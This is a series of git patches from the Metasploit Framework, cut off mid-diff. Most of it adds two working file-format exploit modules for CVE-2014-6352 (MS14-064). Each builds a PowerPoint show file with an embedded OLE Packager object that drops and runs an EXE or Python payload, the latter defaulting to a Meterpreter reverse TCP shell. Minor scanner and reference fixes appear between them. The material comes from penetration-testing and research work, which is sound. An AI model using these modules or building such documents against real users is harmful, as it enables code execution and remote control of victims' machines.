b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master subtitle style11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml new file mode 100755 index 0000000000..c66c858dd6 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml new file mode 100755 index 0000000000..59966d7d92 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml new file mode 100755 index 0000000000..f4d0d72750 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml new file mode 100755 index 0000000000..b13d8c6559 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml new file mode 100755 index 0000000000..9088e3f76e --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml new file mode 100755 index 0000000000..dba15f74fb --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text stylesClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml new file mode 100755 index 0000000000..7f549a0480 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml @@ -0,0 +1,2 @@ + +Click to edit Master title style11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml new file mode 100755 index 0000000000..4bb2d51956 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml @@ -0,0 +1,2 @@ + +11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml new file mode 100755 index 0000000000..5189b5791f --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml new file mode 100755 index 0000000000..923dcd343e --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels new file mode 100755 index 0000000000..6a191ab986 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml new file mode 100755 index 0000000000..60def160d1 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels new file mode 100755 index 0000000000..c1937b38ec --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml new file mode 100755 index 0000000000..8dbbce1549 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml @@ -0,0 +1,2 @@ + +ExampleExamplestyle.visibilitystyle.visibility diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml new file mode 100755 index 0000000000..ecd5f7a019 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml new file mode 100755 index 0000000000..1f0f3c1072 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml new file mode 100755 index 0000000000..f79eedf918 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb new file mode 100644 index 0000000000..3ae471c636 --- /dev/null +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -0,0 +1,153 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) + allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass. + The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms + such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known + to be vulnerable. However, based on our testing, the most reliable setup is on Windows + platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other + setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a + crash due to a failure in the CPackage::CreateTempFileName function. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Haifei Li', # Vulnerability discovery + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-6352'], + ['MSB', 'MS14-064'], + ['BID', '70690'], + ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous'] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 21 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']) + ], self.class) + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + ole_stream = ole_packager + zip = zip_ppsx(ole_stream) + file_create(zip) + end + + def zip_ppsx(ole_stream) + zip_data = {} + data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin') + + Dir["#{data_dir}/**/**"].each do |file| + unless File.directory?(file) + zip_data[file.sub(data_dir,'')] = File.read(file) + end + end + + # add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + zip_data[file.sub(data_dir,'')] = File.read(file) + + # put our own OLE streams + zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream + + # create the ppsx + ppsx = Rex::Zip::Archive.new + zip_data.each_pair do |k,v| + ppsx.add_file(k,v) + end + + ppsx.pack + end + + def ole_packager + payload_name = "#{rand_text_alpha(4)}.exe" + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + p = generate_payload_exe + file = [p.length].pack('V') + file << p + + append_info = [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def create_ole(stream_name, data) + ole_tmp = Rex::Quickfile.new('ole') + stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) + + stm = stg.create_stream(stream_name) + stm << data + stm.close + + directory = stg.instance_variable_get(:@directory) + directory.each_entry do |entry| + if entry.instance_variable_get(:@_ab) == 'Root Entry' + # 0003000C-0000-0000-c000-000000000046 # Packager + clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") + entry.instance_variable_set(:@_clsId, clsid) + end + end + + # write to disk + stg.close + + ole_contents = File.read(ole_tmp.path) + ole_tmp.close + ole_tmp.unlink + + ole_contents + end +end + From b05198c05a554adf693eb1f03a49c7617747e40a Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 12 Nov 2014 07:32:06 -0800 Subject: [PATCH 24/38] Clean up failure messaging when bad CHOST --- lib/msf/core/auxiliary/scanner.rb | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index f2c50e9e39..21bf0f7de9 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -96,13 +96,13 @@ def run loop do # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Spawn threads for each host while (@tl.length < threads_max) # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? ip = ar.next_ip break if not ip @@ -131,7 +131,7 @@ def run end # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Exit once we run out of hosts if(@tl.length == 0) @@ -152,7 +152,7 @@ def run scanner_show_progress() if @show_progress end - scanner_report_fatal_errors + scanner_handle_fatal_errors return end @@ -171,7 +171,7 @@ def run nohosts = false # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? while (@tl.length < threads_max) @@ -218,7 +218,7 @@ def run end # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Exit if there are no more pending threads if (@tl.length == 0) @@ -241,7 +241,7 @@ def run scanner_show_progress() if @show_progress end - scanner_report_fatal_errors + scanner_handle_fatal_errors return end @@ -264,8 +264,12 @@ def seppuko! end end -def scanner_report_fatal_errors - return unless @scan_errors && @scan_errors.length > 0 +def has_fatal_errors? + @scan_errors && !@scan_errors.empty? +end + +def scanner_handle_fatal_errors + return unless has_fatal_errors? return unless @tl # First kill any running threads @@ -275,7 +279,7 @@ def scanner_report_fatal_errors @scan_errors.uniq.each do |emsg| print_error("Fatal: #{emsg}") end - print_status("Scan terminated due to one or more fatal errors") + print_error("Scan terminated due to one or more fatal errors") end def scanner_progress @@ -284,6 +288,8 @@ def scanner_progress end def scanner_show_progress + # it should already be in the process of shutting down if there are fatal errors + return if has_fatal_errors? pct = scanner_progress if pct >= (@range_percent + @show_percent) @range_percent = @range_percent + @show_percent From e65864001440ceee7fa49a6f12e2673ac559e7bf Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 12 Nov 2014 07:38:07 -0800 Subject: [PATCH 25/38] Show uniq error count --- lib/msf/core/auxiliary/scanner.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index 21bf0f7de9..ac4991cbf0 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -276,10 +276,11 @@ def scanner_handle_fatal_errors @tl.each {|t| t.kill if t.alive? } # Show the unique errors triggered by the scan - @scan_errors.uniq.each do |emsg| + uniq_errors = @scan_errors.uniq + uniq_errors.each do |emsg| print_error("Fatal: #{emsg}") end - print_error("Scan terminated due to one or more fatal errors") + print_error("Scan terminated due to #{uniq_errors.size} fatal error(s)") end def scanner_progress From 955a5142ca27c71a18d666e380985d3ea082e2d5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 12 Nov 2014 13:17:32 -0600 Subject: [PATCH 26/38] Edit e-mail address for antispam --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index cbc48eb1f1..94ad28d096 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary This module checks the server for vulnerabilities like TNS Poison. Module sends to server a packet with command to register new TNS Listener and check response. }, - 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] + 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], From d242bc220b7db145a6c5bd46a0a6fd0c459eda52 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 12 Nov 2014 13:25:10 -0600 Subject: [PATCH 27/38] Minor fixups and disclosure date for TNS module --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 94ad28d096..49f42d61cb 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -16,13 +16,16 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle TNS Listener Checker', 'Description' => %q{ This module checks the server for vulnerabilities like TNS Poison. - Module sends to server a packet with command to register new TNS Listener and check response. + Module sends a server a packet with command to register new TNS Listener and checks + for a response indicating an error. If the registration is errored, the target is not + vulnearble. Otherwise, the target is vulnerable to malicious registrations. }, 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], ], + 'DisclosureDate' => 'Apr 18 2012', 'License' => MSF_LICENSE)) register_options( @@ -30,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(1521) ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') # Provided by the TNS mixin, but not needed in a scanner module end def run_host(ip) @@ -41,6 +44,7 @@ class Metasploit3 < Msf::Auxiliary packet = sock.read(100) find_packet = packet.include? "(ERROR_STACK=(ERROR=" find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable") + #TODO: Module should report_vuln if this finding is solid. rescue ::Rex::ConnectionError, ::Errno::EPIPE print_error("#{ip}:#{rport} unable to connect to the server") end From 9df31e950ffd9a35f5eec571594b15c6462d50c4 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Wed, 12 Nov 2014 21:32:33 +0000 Subject: [PATCH 28/38] Add OSVDB id --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 8b4361b4eb..c0349c53c0 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '2014-8499' ], - #[ 'OSVDB', 'TODO' ], + [ 'OSVDB', '114485' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ] ], From f658efe1449816cde41833c259f5474bbc8d5cde Mon Sep 17 00:00:00 2001 From: Trevor Rosen Date: Wed, 12 Nov 2014 16:08:03 -0600 Subject: [PATCH 29/38] Add the ability to specify mode in Rex output file * Because sometimes you might want to append * Preserves original hardcoded 'wb' as default * http://pubs.opengroup.org/onlinepubs/009695399/functions/fopen.html --- lib/rex/ui/text/output/file.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/ui/text/output/file.rb b/lib/rex/ui/text/output/file.rb index c3b9523778..e55f832282 100644 --- a/lib/rex/ui/text/output/file.rb +++ b/lib/rex/ui/text/output/file.rb @@ -14,8 +14,8 @@ class Output::File < Rex::Ui::Text::Output attr_accessor :fd - def initialize(path) - self.fd = ::File.open(path, "wb") + def initialize(path, mode='wb') + self.fd = ::File.open(path, mode) end def supports_color? From e25b6145f9ad0b3ccd5cf2fb3b589c6e3a52fa1f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 13 Nov 2014 00:56:10 -0600 Subject: [PATCH 30/38] Add module for MS14-064 bypassing UAC through python for windows --- .../fileformat/ms14_064_packager_python.rb | 184 ++++++++++++++++++ 1 file changed, 184 insertions(+) create mode 100644 modules/exploits/windows/fileformat/ms14_064_packager_python.rb diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb new file mode 100644 index 0000000000..6d190d3ae8 --- /dev/null +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -0,0 +1,184 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", + 'Description' => %q{ + This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) + allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability + publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista + SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. + However, based on our testing, the most reliable setup is on Windows platforms running + Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as + using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a + failure in the CPackage::CreateTempFileName function. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Haifei Li', # Vulnerability discovery and exploit technique + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-6352'], + ['MSB', 'MS14-064'], + ['BID', '70690'], + ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm'] + ], + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Targets' => + [ + ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'DisclosureDate' => "Nov 12 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']) + ], self.class) + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + zip = zip_ppsx(payload_packager, trigger_packager) + file_create(zip) + end + + def zip_ppsx(ole_payload, ole_trigger) + zip_data = {} + data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template') + + Dir["#{data_dir}/**/**"].each do |file| + unless File.directory?(file) + zip_data[file.sub(data_dir,'')] = File.read(file) + end + end + + # add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + zip_data[file.sub(data_dir,'')] = File.read(file) + + # put our own OLE streams + zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload + zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger + + # create the ppsx + ppsx = Rex::Zip::Archive.new + zip_data.each_pair do |k,v| + ppsx.add_file(k,v) + end + + ppsx.pack + end + + def payload_packager + payload_name = 'tabnanny.py' + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + p = payload.encoded + file = [p.length].pack('V') + file << p + + append_info = [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def trigger_packager + payload_name = "#{rand_text_alpha(4)}.py" + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + random_text = rand_text_alpha(4 + rand(4)) + file = [random_text.length].pack('V') + file << random_text + + append_info = [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def create_ole(stream_name, data) + ole_tmp = Rex::Quickfile.new('ole') + stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) + + stm = stg.create_stream(stream_name) + stm << data + stm.close + + directory = stg.instance_variable_get(:@directory) + directory.each_entry do |entry| + if entry.instance_variable_get(:@_ab) == 'Root Entry' + # 0003000C-0000-0000-c000-000000000046 # Packager + clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") + entry.instance_variable_set(:@_clsId, clsid) + end + end + + # write to disk + stg.close + + ole_contents = File.read(ole_tmp.path) + ole_tmp.close + ole_tmp.unlink + + ole_contents + end + +end + From 38a96e3cfcf7496b7b4adc701a3e473f75ce8495 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 13 Nov 2014 00:56:42 -0600 Subject: [PATCH 31/38] Update target info --- modules/exploits/windows/fileformat/ms14_064_packager_python.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index 6d190d3ae8..c85736b52e 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_PYTHON, 'Targets' => [ - ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ['Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013', {}], ], 'Privileged' => false, 'DefaultOptions' => From 31f3aa1f6d3a63a004dc255c794d69e21561b71e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 13 Nov 2014 01:16:15 -0600 Subject: [PATCH 32/38] Refactor create packager methods --- .../fileformat/ms14_064_packager_python.rb | 62 +++++-------------- 1 file changed, 15 insertions(+), 47 deletions(-) diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index c85736b52e..3b5bf12fb1 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -60,6 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") + payload_packager = create_packager('tabnanny.py', payload.encoded) + trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10))) zip = zip_ppsx(payload_packager, trigger_packager) file_create(zip) end @@ -91,59 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote ppsx.pack end - def payload_packager - payload_name = 'tabnanny.py' - + def create_packager(file_name, contents) file_info = [2].pack('v') - file_info << "#{payload_name}\x00" - file_info << "#{payload_name}\x00" + file_info << "#{file_name}\x00" + file_info << "#{file_name}\x00" file_info << "\x00\x00" extract_info = [3].pack('v') - extract_info << [payload_name.length + 1].pack('V') - extract_info << "#{payload_name}\x00" + extract_info << [file_name.length + 1].pack('V') + extract_info << "#{file_name}\x00" - p = payload.encoded - file = [p.length].pack('V') - file << p + file = [contents.length].pack('V') + file << contents - append_info = [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - - ole_data = file_info + extract_info + file + append_info - ole_contents = [ole_data.length].pack('V') + ole_data - - ole = create_ole("\x01OLE10Native", ole_contents) - - ole - end - - def trigger_packager - payload_name = "#{rand_text_alpha(4)}.py" - - file_info = [2].pack('v') - file_info << "#{payload_name}\x00" - file_info << "#{payload_name}\x00" - file_info << "\x00\x00" - - extract_info = [3].pack('v') - extract_info << [payload_name.length + 1].pack('V') - extract_info << "#{payload_name}\x00" - - random_text = rand_text_alpha(4 + rand(4)) - file = [random_text.length].pack('V') - file << random_text - - append_info = [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) - append_info << [payload_name.length].pack('V') - append_info << Rex::Text.to_unicode(payload_name) + append_info = [file_name.length].pack('V') + append_info << Rex::Text.to_unicode(file_name) + append_info << [file_name.length].pack('V') + append_info << Rex::Text.to_unicode(file_name) + append_info << [file_name.length].pack('V') + append_info << 